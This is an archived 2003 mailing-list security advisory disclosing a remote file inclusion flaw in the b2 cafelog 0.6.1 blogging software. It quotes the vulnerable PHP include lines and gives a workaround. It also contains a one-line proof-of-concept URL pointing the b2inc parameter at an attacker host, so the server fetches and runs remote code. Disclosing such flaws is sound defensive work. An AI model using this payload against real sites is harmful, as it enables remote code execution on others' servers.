lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <3ED5B53E.8050903@scan-associates.net>
Date: Thu, 29 May 2003 15:22:38 +0800
From: pokleyzz <pokleyzz@...n-associates.net>
To: vulnwatch@...nwatch.org, bugtraq@...urityfocus.com
Cc: tech@...n-associates.net
Subject: b2 cafelog 0.6.1 remote command execution.


Products: b2 cafelog 0.6.1 (http://cafelog.com/)
Date: 29 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
                shaharil_at_scan-associates.net
                munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary:  b2 cafelog 0.6.1 remote command execution.

Description
===========
b2 cafelog is blogger system written in php with mysql ad database backend.

Details
=======
b2 cafelog 0.6.1 come with directory b2-tools.  This directory contain 2 
php scripts
(blogger-2-b2.php and gm-2-b2.php) which allow user to specify $b2inc and do
remote code injection.

from blogger-2-b2.php line 21 
-----------------------------------------------------
case "step1":

    include("b2config.php");
    include("$b2inc/b2functions.php");
    include("$b2inc/b2vars.php");
------------------------------------------------------------------------------------

from gm-2-b2.php line 5 
----------------------------------------------------------
// 3. load in the browser from there

include("b2config.php");
include($b2inc."/b2functions.php");
-----------------------------------------------------------------------------------

Proof of concept
===========
http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com
attacker.com have file named b2functions.php with php script you want to
execute.

Workaround
=========
Remove b2-tools directory.

Vendor Response
===============
Vendor has been contacted on 19/05/2003 but to reply given.




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ